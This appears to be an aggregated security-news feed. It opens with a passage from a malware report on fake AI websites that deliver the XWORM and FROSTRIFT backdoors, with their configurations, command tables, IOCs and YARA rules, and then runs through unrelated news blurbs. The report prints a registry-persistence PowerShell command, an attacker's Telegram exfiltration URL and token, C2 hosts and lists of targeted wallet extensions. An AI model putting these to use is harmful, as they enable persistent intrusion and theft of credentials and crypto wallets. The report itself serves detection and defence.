Secondly, the launcher executes the file %APPDATA%\pythonw\pythonw.exe, which side-loads the DLL heif.dll and injects XWORM into a legitimate Windows process. XWORM is a .NET-based backdoor that communicates using a custom binary protocol over TCP. Its core functionality involves expanding its capabilities through a plugin management system. Downloaded plugins are written to disk and executed. Supported capabilities include keylogging, command execution, screen capture, and spreading to USB drives. XWORM Configuration The malware begins by decoding its configuration using the AES algorithm. Figure 17: Decryption of configuration Table 6 shows the extracted malware configuration. XWORM Malware Configuration Host artisanaqua[.]ddnsking[.]com Port number 25699 KEY <123456789> SPL Version XWorm V5.2 USBNM USB.exe Telegram Token 8060948661:AAFwePyBCBu9X-gOemLYLlv1owtgo24fcO0 Telegram ChatID -1002475751919 Mutex ZMChdfiKw2dqF51X Table 6: XWORM configuration Host Reconnaissance The malware then performs a system survey to gather the following information: Bot ID Username OS Name If it’s running on USB CPU Name GPU Name Ram Capacity AV Products list Sample of collected information: ☠ [KW-2201] New Clinet : UserName : OSFullName : USB : CPU : GPU : RAM : Groub : This information is sent to a Telegram chat: hxxps[:]//api[.]telegram[.]org:443/bot8060948661:AAFwePyBCBu9X-gOemLYLlv1 owtgo24fcO0/sendMessage?chat_id=-1002475751919&text= Keylogging The malware sample saves the logged keystrokes to the file %temp%\Log.tmp. Sample of content of Log.tmp: ....### explorer ###..[Back] [Back] b a n k [ENTER] C2 Communication The sample connects to its C2 server at tcp://artisanaqua[.]ddnsking[.]com:25699 and initially sends the following information to the C2: "INFOvictim_iduser os_nameXWorm V5.2date_in_dd/mm/yyyy is_sample_name_USB.exe is_administratorhas_webcamcpu_info gpu_inforam_sizeinstalled_AVs" Then the sample waits for any of the following supported commands: Command Description Command Description pong echo back to server StartDDos Spam HTTP requests over TCP to target rec restart bot StopDDos Kill DDOS threads CLOSE shutdown bot StartReport List running processes continuously uninstall self delete StopReport Kill process monitoring threads update uninstall and execute received new version Xchat Send C2 message DW Execute file on disk via powershell Hosts Get hosts file contents FM Execute .NET file in memory Shosts Write to file, likely to overwrite hosts file contents LN Download file from supplied URL and execute on disk DDos Unimplemented Urlopen Perform network request via browser ngrok Unimplemented Urlhide Perform network request in process plugin Load a Bot plugin PCShutdown Shutdown PC now savePlugin Save plugin to registry and load it HKCU\Software\\= PCRestart Restart PC now RemovePlugins Delete all plugins in registry PCLogoff Log off OfflineGet Read Keylog RunShell Execute CMD on shell $Cap Get screen capture Table 7: Supported commands FROSTRIFT Lastly, the launcher executes the file %APPDATA%\ffplay\ffplay.exe to side-load the DLL %APPDATA%\ffplay\libde265.dll and inject FROSTRIFT into a legitimate Windows process. FROSTRIFT is a .NET backdoor that collects system information, installed applications, and crypto wallets. Instead of receiving C2 commands, it receives .NET modules that are stored in the registry to be loaded in-memory. It communicates with the C2 server using GZIP-compressed protobuf messages over TCP/SSL. Malware Configuration The malware starts by decoding its configuration, which is a Base64-encoded and GZIP-compressed protobuf message embedded within the strings table. Figure 18: FROSTRIFT configuration Table 8 shows the extracted malware configuration. Field  Value Protobuf Tag 38 C2 Domain strokes.zapto[.]org C2 Port 56001 SSL Certificate Unknown Default Installation folder APPDATA Mutex 7d9196467986 Table 8: FROSTRIFT configration Persistence FROSTRIFT can achieve persistence by running the command: powershell.exe "Remove-ItemProperty -Path 'HKCU:\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run' -Name ' ';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run' -Name '' -Value '""%APPDATA% \""' -PropertyType 'String'" The sample copies itself to %APPDATA% and adds a new registry value under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the new file path as data to ensure persistence at each system startup. Host Reconnaissance The following information is initially collected and submitted by the malware to the C2: Collected Information Host information Installed Anti-Virus  Web camera  Hostname Username and Role OS name Local time Victim ID HEX digest of the MD5 hash for the following combined: Sample process ID Disk drive serial number Physical memory serial number Victim user name Malware Version 4.1.8 Software Applications com.liberty.jaxx  Foxmail  Telegram Browsers (see Table 10) Standalone Crypto Wallets Atomic, Bitcoin-Qt, Dash-Qt, Electrum, Ethereum, Exodus, Litecoin-Qt, Zcash, Ledger Live Browser Extension Password managers, Authenticators, and Digital wallets (see Table 11) Others 5th entry from the Config (“Default” in this sample) Malware full file path Table 9: Collected information FROSTRIFT checks for the existence of the following browsers: Chromium, Chrome, Brave, Edge, QQBrowser, ChromePlus, Iridium, 7Star, CentBrowser, Chedot, Vivaldi, Kometa, Elements Browser, Epic Privacy Browser, uCozMedia Uran, Sleipnir5, Citrio, Coowon, liebao, QIP Surf, Orbitum, Dragon, Amigo, Torch, Comodo, 360Browser, Maxthon3, K-Melon, Sputnik, Nichrome, CocCoc, Uran, Chromodo, Atom Table 10: List of browsers FROSTRIFT also checks for the existence of 48 browser extensions related to Password managers, Authenticators, and Digital wallets. The full list is provided in Table 11. String Extension ibnejdfjmmkpcnlpebklmnkoeoihofec TronLink nkbihfbeogaeaoehlefnkodbefgpgknn MetaMask fhbohimaelbohpjbbldcngcnapndodjp Binance Chain Wallet ffnbelfdoeiohenkjibnmadjiehjhajb Yoroi cjelfplplebdjjenllpjcblmjkfcffne Jaxx Liberty fihkakfobkmkjojpchpfgcmhfjnmnfpi BitApp Wallet kncchdigobghenbbaddojjnnaogfppfj iWallet aiifbnbfobpmeekipheeijimdpnlpgpp Terra Station ijmpgkjfkbfhoebgogflfebnmejmfbml BitClip blnieiiffboillknjnepogjhkgnoapac EQUAL Wallet amkmjjmmflddogmhpjloimipbofnfjih Wombat jbdaocneiiinmjbjlgalhcelgbejmnid Nifty Wallet afbcbjpbpfadlkmhmclhkeeodmamcflc Math Wallet hpglfhgfnhbgpjdenjgmdgoeiappafln Guarda aeachknmefphepccionboohckonoeemg Coin98 Wallet imloifkgjagghnncjkhggdhalmcnfklk Trezor Password Manager oeljdldpnmdbchonielidgobddffflal EOS Authenticator gaedmjdfmmahhbjefcbgaolhhanlaolb Authy ilgcnhelpchnceeipipijaljkblbcobl GAuth Authenticator bhghoamapcdpbohphigoooaddinpkbai Authenticator mnfifefkajgofkcjkemidiaecocnkjeh TezBox dkdedlpgdmmkkfjabffeganieamfklkm Cyano Wallet aholpfdialjgjfhomihkjbmgjidlcdno Exodus Web3 jiidiaalihmmhddjgbnbgdfflelocpak BitKeep hnfanknocfeofbddgcijnmhnfnkdnaad Coinbase Wallet egjidjbpglichdcondbcbdnbeeppgdph Trust Wallet hmeobnfnfcmdkdcmlblgagmfpfboieaf XDEFI Wallet bfnaelmomeimhlpmgjnjophhpkkoljpa Phantom fcckkdbjnoikooededlapcalpionmalo MOBOX WALLET bocpokimicclpaiekenaeelehdjllofo XDCPay flpiciilemghbmfalicajoolhkkenfel ICONex hfljlochmlccoobkbcgpmkpjagogcgpk Solana Wallet cmndjbecilbocjfkibfbifhngkdmjgog Swash cjmkndjhnagcfbpiemnkdpomccnjblmj Finnie knogkgcdfhhbddcghachkejeap Keplr kpfopkelmapcoipemfendmdcghnegimn Liquality Wallet hgmoaheomcjnaheggkfafnjilfcefbmo Rabet fnjhmkhhmkbjkkabndcnnogagogbneec Ronin Wallet klnaejjgbibmhlephnhpmaofohgkpgkd ZilPay ejbalbakoplchlghecdalmeeeajnimhm MetaMask ghocjofkdpicneaokfekohclmkfmepbp Exodus Web3 heaomjafhiehddpnmncmhhpjaloainkn Trust Wallet hkkpjehhcnhgefhbdcgfkeegglpjchdc Braavos Smart Wallet akoiaibnepcedcplijmiamnaigbepmcb Yoroi djclckkglechooblngghdinmeemkbgci MetaMask acdamagkdfmpkclpoglgnbddngblgibo Guarda Wallet okejhknhopdbemmfefjglkdfdhpfmflg BitKeep mijjdbgpgbflkaooedaemnlciddmamai Waves Keeper Table 11: List of browser extensions C2 Communication  The malware expects the C2 to respond by sending GZIP-compressed Protobuf messages with the following fields: registry_val: A registry value under HKCU\Software\ to store the loader_bytes. loader_bytes: Assembly module to load the loaded_bytes (stored at registry in reverse order). loaded_bytes: GZIP-compressed assembly module to be loaded in-memory. The sample receives loader_bytes only in the first message as it stores it under the registry value HKCU\Software\\registry_val. For the subsequent messages, it only receives registry_val which it uses to fetch loader_bytes from the registry. The sample sends empty GZIP-compressed Protobuf messages as a keep-alive mechanism until the C2 sends another assembly module to be loaded. The malware has the ability to download and execute extra payloads from the following hardcoded URLs (this feature is not enabled in this sample): WebDriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll; chromedriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe msedgedriver2.exe: hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe The files are WebDrivers for browsers that can be used for testing, automation, and interacting with the browser. They can also be used by attackers for malicious purposes, such as deploying additional payloads. Conclusion As AI has gained tremendous momentum recently, our research highlights some of the ways in which threat actors have taken advantage of it. Although our investigation was limited in scope, we discovered that well-crafted fake “AI websites” pose a significant threat to both organizations and individual users. These AI tools no longer target just graphic designers; anyone can be lured in by a seemingly harmless ad. The temptation to try the latest AI tool can lead to anyone becoming a victim. We advise users to exercise caution when engaging with AI tools and to verify the legitimacy of the website's domain.  Acknowledgements Special thanks to Stephen Eckels, Muhammad Umair, and Mustafa Nasser for their assistance in analyzing the malware samples. Richmond Liclican for his inputs and attribution. Ervin Ocampo, Swapnil Patil, Muhammad Umer Khan, and Muhammad Hasib Latif for providing the detection opportunities. Detection Opportunities The following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI).  Host-Based IOCs File SHA256 Notes Lumalabs_1926326251082123689-626.zip 8863065544df546920ce6189dd3f99ab3f5d644d3d9c440667c1476174ba862b Downloaded ZIP archive Lumalabs_1926326251082123689-626.mp4⠀.exe d3f50dc61d8c2be665a2d3933e2668448edc31546fea84517f8e61237c6d2e5d STARKVEIL C:\winsystem\heif\heif.dll 839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b Launcher %APPDATA%\Launcher\libde265.dll  4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959 Persistence %APPDATA%\python\avcodec-61.dll 8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc GRIMPULL %APPDATA%\pythonw\heif.dll a0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3 XWORM C:\winsystem\heif-info\heif.dll 1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb XWORM %APPDATA%\ffplay\libde265.dll dcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3 FROSTRIFT C:\winsystem\heif2rgb\heif.dll e663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822 FROSTRIFT Network-Based IOCs Malware Command and Control Domain strokes.zapto[.]org:7789 artisanaqua[.]ddnsking[.]com:25699 strokes.zapto[.]org:56001 Fake AI Domains Domain Registration Date creativepro[.]ai 2024-07-10 boostcreatives[.]ai 2024-07-12 creativepro-ai[.]com 2024-08-02 boostcreatives-ai[.]com 2024-08-04 creativespro-ai[.]com 2024-08-07 klingxai[.]com 2024-09-19 lumaai-labs[.]com 2024-09-29 klings-ai[.]com 2024-10-17 luma-dream[.]com 2024-10-26 quirkquestai[.]com 2024-11-02 lumaai-dream[.]com 2024-11-06 lumaai-lab[.]com 2024-11-08 lumaaidream[.]com 2024-11-09 lumaailabs[.]com 2024-11-10 luma-dreamai[.]com 2024-11-12 ai-kling[.]com 2024-11-22 dreamai-luma[.]com 2024-12-13 aikling[.]ai 2025-01-04 aisoraplus[.]com 2025-01-07 lumalabsai[.]in 2025-01-16 canvadream-lab[.]com 2025-01-20 canvadreamlab[.]com 2025-01-25 adobe-express[.]com 2025-02-08 canva-dreamlab[.]com 2025-02-12 canvadreamlab[.]ai 2025-02-14 canvaproai[.]com 2025-02-17 capcutproai[.]com 2025-02-22 luma-aidream[.]com 2025-02-27 luma-dreammachine[.]com 2025-03-07 YARA Rules rule G_Dropper_COILHATCH_1 { meta: author = "Mandiant" strings: $i1 = "zlib.decompress" ascii wide $i2 = "rc4" ascii wide $i3 = "aes_decrypt" ascii wide $i4 = "xor" ascii wide $i5 = "rsa_decrypt" ascii wide $r1 = "private_key" ascii wide $r2 = "runner" ascii wide $r3 = "marshal" ascii wide $r4 = "marshal.loads" ascii wide $r5 = "b85decode" ascii wide $r6 = "exceute_func" ascii wide $r7 = "hybrid_decrypt" ascii wide condition: (4 of ($i*)) and all of ($r*) } rule G_Dropper_STARKVEIL_1 { meta: author = "Mandiant" strings: $p00_0 = { 56 57 53 48 83 EC ?? 48 8D AA [4] 48 8B 7D ?? 48 8B 4F ?? FF 15 [4] 48 89 F9 } $p00_1 = { 0F 0B 66 0F 1F 84 00 [4] 48 89 54 24 ?? 55 41 56 56 57 53 48 83 EC } condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (($p00_0 in (48000 .. 59000) and $p00_1 in (100000 .. 120000))) } import "dotnet" rule G_Downloader_GRIMPULL_1 { meta: author = "Mandiant" strings: $str1 = "SbieDll.dll" ascii wide $str2 = "cuckoomon.dll" ascii wide $str3 = "vmGuestLib.dll" ascii wide $str4 = "select * from Win32_BIOS" ascii wide $str5 = "VMware|VIRTUAL|A M I|Xen" ascii wide $str6 = "Microsoft|VMWare|Virtual" ascii wide $str7 = "win32_process.handle='{0}'" ascii wide $str8 = "stealer" ascii wide $code = { 11 20 11 0F 11 20 11 0F 91 11 1A 11 0F 91 61 D2 9C } condition: dotnet.is_dotnet and all of them } rule G_Backdoor_FROSTRIFT_1 { meta: author = "Mandiant" strings: $guid = "$23e83ead-ecb2-418f-9450-813fb7da66b8" $r1 = "IdentifiableDecryptor.DecryptorStack" $r2 = "$ProtoBuf.Explorers.ExplorerDecryptor" $s1 = "\\User Data\\" wide $s2 = "SELECT * FROM AntiVirusProduct" wide $s3 = "Telegram.exe" wide $s4 = "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" wide $s5 = "Litecoin-Qt" wide $s6 = "Bitcoin-Qt" wide condition: uint16(0) == 0x5a4d and (all of ($s*) or $guid or all of ($r*)) } YARA-L Rules Mandiant has made the relevant rules available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set. The activity discussed in the blog post is detected under the rule names: Suspicious Binary File Execution - MP4 Masquerade Suspicious Binary File Execution - Double Extension and Braille Pattern Blank Masquerade Python Script Deobfuscation - Base85 ZLib Marshal Suspicious Staging Directory WinSystem DLL Search Order Hijacking AVCodec61 DLL Search Order Hijacking HEIF DLL Search Order Hijacking Libde265

Multiple vulnerabilities were identified in Debian Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege and sensitive information disclosure on the targeted system. Impact Elevation of Privilege Information Disclosure Denial of Service System / Technologies affected Debian bookworm versions prior to 6.1.140-1 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://lists.debian.org/debian-security-announce/2025/msg00088.html

De multiples vulnérabilités ont été découvertes dans les produits Mattermost. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

A Base de Dados Europeia de Vulnerabilidades (EUVD), desenvolvida pela ENISA (Agência da União Europeia para a Cibersegurança), contribui para o reforço da cibersegurança da União Europeia (UE) e está disponível e acessível, de forma pública, a todas as partes interessadas. Visa melhorar a gestão de vulnerabilidades em produtos com componentes digitais, ao promover uma resposta mais coordenada e eficaz às ameaças no domínio da cibersegurança A Base de Dados advém de um requisito da Diretiva NIS 2. Resulta de diversas fontes de informação, nomeadamente do Programa CVE (Common Vulnerabilities and Exposures) gerido pela MITRE Corporation (organização americana sem fins lucrativos). Beneficia de políticas de divulgação coordenada de vulnerabilidades implementadas pelos Estados-Membros da União Europeia, em particular as comunicadas às CSIRT (Computer Security Incident Response Team) da UE, e ainda da identificação de vulnerabilidades em produtos informáticos descobertas por parte destas equipas, conforme previsto pelo enquadramento legislativo da UE. A EUVD pretende ser instrumento para a implementação do Regulamento Ciber-Resiliência (Cyber Resilience Act), ao garantir que produtos com componentes digitais, tais como software e dispositivos, estejam protegidos contra ameaças. Este é mais um passo no sentido de fortalecer a resiliência da UE, ao melhorar a análise e facilitar a correlação de vulnerabilidades, permitindo uma melhor gestão dos riscos de cibersegurança. Mais informações Consulte a base de dados  

On May 8, GreyNoise observed a highly coordinated reconnaissance campaign launched by 251 malicious IP addresses, all geolocated to Japan and hosted by Amazon AWS. The infrastructure and execution suggest centralized planning.

Announcing Graylog 6.3.0-beta.3 Graylog 6.3.0-beta.3 Release date: 2025-05-26 Upgrade notes DEB and RPM packages are available in our repositories Docker Compose Container images: Graylog Open Graylog Enterprise Graylog Data Node Tarballs for manual installation: Graylog Server Graylog Server (bundled JVM, linux-x64) Graylog Server (bundled JVM, linux-aarch64) Graylog Enterprise Server Graylog Enterprise Server (bundled JVM, linux-x64) […] The post Announcing Graylog 6.3.0-Beta.3 appeared first on Graylog.

Industrial control systems, smart-city infrastructure, and remote IoT sensors keep the modern world humming, but most of these devices were never built for today’s threat landscape. They run proprietary firmware, lack the horsepower for agents, and often sit in locations where rolling a truck is impractical. Traditionally they’ve been labeled “unprotectable.”

Learn how to prevent lateral movement in enterprise networks with seven effective strategies—covering segmentation, detection, and response with real examples. The post 7 Proven Tactics for Preventing Lateral Movement in Enterprise Networks appeared first on Fidelis Security.

Overview The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released an urgent updated advisory highlighting cyber threat activity targeting Commvault’s Metallic Software-as-a-Service (SaaS) platform, which is widely used to back up Microsoft 365 environments. As of May 2025, threat actors reportedly leverage stolen credentials to gain unauthorized access to service principals, prompting serious concerns about cloud supply chain security and elevated privilege abuse across enterprise networks. What Is Commvault Metallic and Why Does It Matter Commvault’s Metallic is a cloud-based backup and recovery service hosted on Microsoft Azure. It allows enterprises to back up Exchange Online, SharePoint, OneDrive, Teams, and other Microsoft 365 data. Because it connects directly to the enterprise Microsoft Entra ID (formerly Azure AD), any compromise in its configuration or credentials can have devastating downstream effects. In this case, attackers may have accessed stored client secrets used by Metallic to authenticate with Microsoft 365 environments. These secrets can act like keys to an organization’s entire cloud infrastructure. Timeline of Activity CISA’s May 22 advisory is an update to a broader investigation into threat actors exploiting default configurations and poorly secured service accounts across multiple cloud platforms. The advisory links the Commvault incident to a growing number of similar supply chain attacks, wherein attackers: Exploit misconfigured cloud applications Abuse of elevated privileges Move laterally across SaaS and identity infrastructures The precise number of affected organizations remains unknown, but the shared nature of SaaS platforms suggests the potential for widespread impact. Key Threat Indicators and Attack Surface According to the advisory, attackers exploited vulnerabilities in storing or managing credentials within the Metallic SaaS platform. They then used these secrets to authenticate against customers' Microsoft Entra ID environments. Affected organizations may observe the following behaviors: Unexpected sign-ins using Commvault service principals Unauthorized modifications to service principal credentials Elevated permissions granted to applications without administrator review Lateral movement into broader M365 environments This pattern suggests a well-orchestrated campaign focused on supply chain exploitation through trusted cloud vendors. Recommended Immediate Actions CISA has outlined a comprehensive set of mitigation steps. Based on Cyble’s threat intelligence and best practices, we strongly encourage organizations to implement the following controls: 1. Audit Service Principal Activity Review Microsoft Entra audit logs for unusual activity involving Commvault-managed identities. Key events to monitor include: Credential updates Sign-ins from suspicious IP ranges Creation of new credentials Consent grants involving high-privilege scopes 2. Enforce Conditional Access For single-tenant applications, restrict authentication to only IP addresses within Commvault’s known allowlisted ranges. This reduces the chance of stolen credentials being used from foreign infrastructure. 3. Rotate Application Secrets Immediately If your organization used Commvault’s Metallic solution before May 2025, assume compromise and rotate credentials. From then on, set policies to auto-rotate secrets every 30 days. 4. Review OAuth and Graph API Permissions Applications often request elevated Graph API scopes, such as Mail.ReadWrite or Files.Read.All. Audit existing app consents and remove those not essential for operations. Ensure admin consent was granted correctly. 5. Implement Secure Cloud Baselines Follow CISA’s Secure Cloud Business Applications (SCuBA) guidance. These baselines help limit excessive privileges, enforce MFA, and reduce lateral movement paths. 6. Enable Unified Audit Logging If not already enabled, turn on Microsoft 365’s unified audit logging to track Exchange, SharePoint, Teams, and Entra activities in a single dashboard. This is critical for long-term forensics. On-Premise Commvault Customers Are Also at Risk Although the focus remains on the Metallic SaaS platform, customers using on-premises Commvault installations are also advised to harden their configurations. Recommendations include: Restricting UI access to trusted internal IPs Deploying a Web Application Firewall (WAF) to block path traversal or malicious uploads Monitoring for unusual activity originating from installation directories Removing any public-facing management portals Applying all available patches from Commvault promptly CVE-2025-3928: A Known Exploited Weakness CISA has added CVE-2025-3928—a vulnerability related to credential storage—to its Known Exploited Vulnerabilities (KEV) catalog. This move requires all federal civilian executive branch agencies to remediate the issue by a specified deadline. Enterprises in regulated sectors such as healthcare, financial services, and energy should treat this as a high-severity incident and act accordingly. Why This Attack Matters to the Broader Ecosystem The Commvault advisory is part of a broader pattern of attacks exploiting the trust boundaries between SaaS providers and identity infrastructures. As organizations increasingly adopt SaaS platforms, their attack surface now includes: Third-party cloud vendors with default configurations Overprivileged service principals Long-lived credentials with no rotation policies OAuth tokens and consent mechanisms Once attackers gain access to a service principal, they can impersonate the application to access customer data, create new users, or exfiltrate sensitive information—all while hiding in legitimate activity logs. This highlights the critical need to treat SaaS security as an extension of your zero-trust strategy. Incident Response and Reporting If your organization suspects compromise: Disconnect suspicious service principals immediately Reset associated credentials Notify internal response teams Report incidents to National CERTs Enterprises are also encouraged to engage with trusted threat intelligence vendors to conduct a broader compromise assessment. Final Thoughts The exploitation of Commvault’s Metallic SaaS platform underlines a dangerous evolution in attacker tactics. Instead of brute-forcing user accounts or exploiting endpoints, threat actors are now targeting trusted service relationships between SaaS platforms and cloud identity providers. Organizations that do not have full visibility into these service relationships—and do not regularly audit and rotate application secrets—may be blind to these threats. As supply chain attacks continue to evolve, so must our defenses. References: https://www.cisa.gov/news-events/alerts/2025/05/22/advisory-update-cyber-threat-activity-targeting-commvaults-saas-cloud-application-metallic The post CISA Updates Advisory for Active Exploitation Targeting Commvault Metallic SaaS Cloud Platform appeared first on Cyble.

Strengthen your security with proactive endpoint threat hunting—detect stealthy threats early, reduce dwell time, and accelerate response using Fidelis deep session visibility and automated investigation workflows. The post Mastering Endpoint Threat Hunting: 7 Proven Practices for Uncovering Hidden Attacks appeared first on Fidelis Security.

The Closing & Awards Ceremony of the Huawei ICT Competition 2024–2025 Global Final took place in Shenzhen.

We were thrilled by the remarkable interest in speaking at TechCrunch Disrupt 2025, taking place October 27–29 at Moscone West in San Francisco. After an in-depth review process, we’ve selected 20 exceptional finalists — 10 for breakout sessions and 10 for roundtables. Now we’re putting the final decision in your hands. Audience Choice voting is […]

See how to use GitHub Copilot to engage in some test-driven development. The post GitHub for Beginners: Test-driven development (TDD) with GitHub Copilot appeared first on The GitHub Blog.

Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. This week, we look back on some highlights from the first couple of months of posts, including the broad view exposure management provides, business impact and getting to a single pane of glass. You can read the entire Exposure Management Academy series here.Since we started the Exposure Management Academy in March, we’ve covered a range of topics with contributions from many of Tenable’s industry experts. In this post, we look at a few of the highlights, focusing on the work of three Tenable thought leaders: information security engineer Arnie Cabral, CSO Robert Huber and CIO Patricia Grant.Exposure management provides a broader viewIf you’re wondering about exposure management, you should pay attention to Arnie Cabral. He’s on the front lines as we move to exposure management internally. Cabral wrote that Tenable’s shift began with a simple realization.“We knew that, although it is critical to modern cybersecurity, vulnerability management alone doesn’t provide a complete picture of cyber risk,” he wrote. He added that traditional vulnerability management involves scanning assets for known vulnerabilities and remediating them based on severity scores. “However, true security risk management requires a broader view that includes misconfigurations, attack surface visibility and real-time threat intelligence,” he wrote. To get going, he reframed existing policies to align with the new approach. This wasn’t just a matter of editing the text, he noted. “Instead, we redefined our objectives and transformed our policies to ensure alignment with emerging risk-based exposure management frameworks,” he wrote.Read all of Arnie’s post: What it Takes to Start the Exposure Management Journey.It’s all about business impactWith a quarter century in cybersecurity, Robert Huber has the perspective it takes to separate the wheat from the chaff when it comes to risk prioritization.Robert believes that, in the shift to exposure management, you need to start with the right data. “One of the big struggles for security professionals is context switching,” he wrote. “When you meet with your business leaders to update them, you often have to scramble to pull together inputs from a dozen different tools and teams.” He added that data is siloed, often incomplete and nearly impossible to compare. He noted that security professionals need to be able to give CEOs and other leaders a clear, coherent picture of the most acute exposures. But they often struggle to obtain an accurate picture.So, when Tenable started moving to exposure management, Huber ensured that the first step was to assimilate the data. “And I mean all of it,” he wrote. “We combed through tools, platforms and teams for every scrap of data.”He added that, until you bring all that data together, you can’t prioritize. Read all of Robert’s post: Turn to Exposure Management to Prioritize Risks Based on Business Impact.Getting to a single pane of glass Tenable CIO Patricia Grant has 30 years of experience leading technology transformation initiatives for both employees and customers.She thinks that securing an enterprise is a responsibility that IT and security share. “While the CSO defines the strategy and risk posture, IT plays a critical role in execution — from patching systems and deploying controls to maintaining uptime and interpreting security signals,” she wrote.As a result, she believes a tight alignment between IT and security is essential. “Ultimately, you can’t do exposure management the right way without a strong relationship between the CIO and the CSO,” she wrote. “We’re both accountable and responsible for protecting our employees, customers, partners and the company. And we both bring something essential to the table.”She added that exposure management helps keep IT and security teams on track — and they gain a unified view across all assets. “I’m not a fan of ‘swivel-chair security,’” she wrote. “I don’t want my team jumping between tools trying to figure out what to fix first. Exposure management moves us toward a single pane of glass.” According to Patricia, it’s easier to understand what needs to be patched now and what can wait. “That kind of visibility is essential when your infrastructure spans everything from data centers and headquarters to home offices and digital nomads working from just about anywhere,” she wrote.Read all of Patricia’s post: Exposure Management Works When the CIO and CSO Are in SyncHave a question about exposure management you’d like us to tackle?We’re all ears. Share your question and maybe we’ll feature it in a future post. MktoForms2.loadForm("//info.tenable.com", "934-XQB-568", 14070);

An AI-powered, data-driven CX strategy drives loyalty, agility, and growth at scale.

Today, HR is being asked to make informed and strategic decisions quickly and all employees are expected to work smarter and faster.

SOCs are overworked and struggling to manage alerts.

The internet is rife with hidden threats that often go undetected until they strike – unless you know where to look. In a remarkable case of DNS Zero-Day Infostealer Detection, EfficientIP’s DNS Threat Intelligence exposed and blocked a previously unknown infostealer that leverages DNS infrastructure for data exfiltration while evading traditional detection mechanisms, slipping past… The post DNS Zero-Day Infostealer Detection by Threat Intelligence: Deep Dive appeared first on EfficientIP.

Watching memory DIMMs get sorted like Wonka children inside SK TES' facility.

Cleartext Storage of Sensitive Information vulnerability (CVE-2025-4053) has been found in Be-Tech Mifare Classic cards software.

You’re standing in the grocery store, comparing the nutrition information for two different cereals. The enriched wheat bran cereal has more B12 vitamin content than your favorite sugary one. As an adult, you know that your body needs the additional vitamins in the enriched bran flakes, even if you really want that fruity, sugary hit […] The post The Value of Data Enrichment in Cybersecurity Data appeared first on Graylog.

Hackers. AI data scrapes. Government surveillance. Thinking about where to start when it comes to protecting your online privacy can be overwhelming. Here’s a simple guide for you—and anyone who claims they have nothing to hide.

What is Project Management in OT/ICS? Project management in OT/ICS is the structured execution of engineering, automation, and cybersecurity initiatives within industrial environments. These projects have a clear start and end point, and typically deliver a service or result, not just a product. In this context, managing an OT cybersecurity project aligned with IEC 62443 […] The post Project Management in OT/ICS Projects with IEC 62443 and MITRE ATT&CK using Radiflow appeared first on Radiflow.

Education industry security leader shares things to consider after a major incident.

In December 2024, cybersecurity researchers uncovered an alarming zero-day remote code execution (RCE) vulnerability in Cleo’s managed file transfer products, as first reported by CSO Online.

OPSWAT is heading to Sydney for the OT Cyber Resilience Summit NSW 2025, and we’re excited to connect with security leaders and critical infrastructure operators from across the region.

Ce bulletin d'actualité du CERT-FR revient sur les vulnérabilités significatives de la semaine passée pour souligner leurs criticités. Il ne remplace pas l'analyse de l'ensemble des avis et alertes publiés par le CERT-FR dans le cadre d'une analyse de risques pour prioriser l'application des...

Just 24 hours left to lock in Early Bird pricing for TechCrunch Disrupt 2025 — happening October 27–29 at Moscone West in San Francisco. Save up to $900 on your pass, or bring someone brilliant with you for 90% off their ticket. This deal ends tonight at 11:59 p.m. PT. Grab your Early Bird discount […]

A leak of 200,000 internal Black Basta chat messages reveals how a modern ransomware group structures its operations to attack victims, employing a range of tactics that, theoretically, should be easy to defend against.

Plus: A mysterious hacking group’s secret client is exposed, Signal takes a swipe at Microsoft Recall, Russian hackers target security cameras to spy on aid to Ukraine, and more.

The U.S. Department of Justice (DoJ) on Thursday announced the disruption of the online infrastructure associated with DanaBot (aka DanaTools) and unsealed charges against 16 individuals for their alleged involvement in the development and deployment of the malware, which it said was controlled by a Russia-based cybercrime organization. The malware, the DoJ said, infected more […]

May 23, 2025Ravie LakshmananRansomware / Dark Web As part of the latest “season” of Operation Endgame, a coalition of law enforcement agencies have taken down about 300 servers worldwide, neutralized 650 domains, and issued arrest warrants against 20 targets. Operation Endgame, first launched in May 2024, is an ongoing law enforcement operation targeting services and […]

The recruiter website fixed the email address exposure earlier this week.

An example of how a single malware operation can enable both criminal and state-sponsored hacking.

AI assistants can't be trusted to produce safe code.

Veo 3 is a major leap in AI video synthesis, but the sound effects need more cooking time.

Data breaches are a devastating experience for any company – you lose revenue, hundreds of hours of productivity, customer confidence, and sleep, as you try to undo the damage.  One small comfort is that a payout from your cybersecurity insurance will offset some of your lost revenue—or will it? A recent analysis reveals that 40%… The post Think You’re Covered? 40% of Cyber Insurance Claims Say Otherwise appeared first on Portnox.

As threats become more sophisticated and networks more distributed, traditional segmentation strategies no longer offer adequate protection. Flat networks or coarse segmentation can give attackers free rein once they gain access. Microsegmentation offers a modern solution, and with Network Access Control (NAC), it becomes scalable and enforceable. Microsegmentation is the practice of dividing a network… The post How to Use NAC for Microsegmentation appeared first on Portnox.

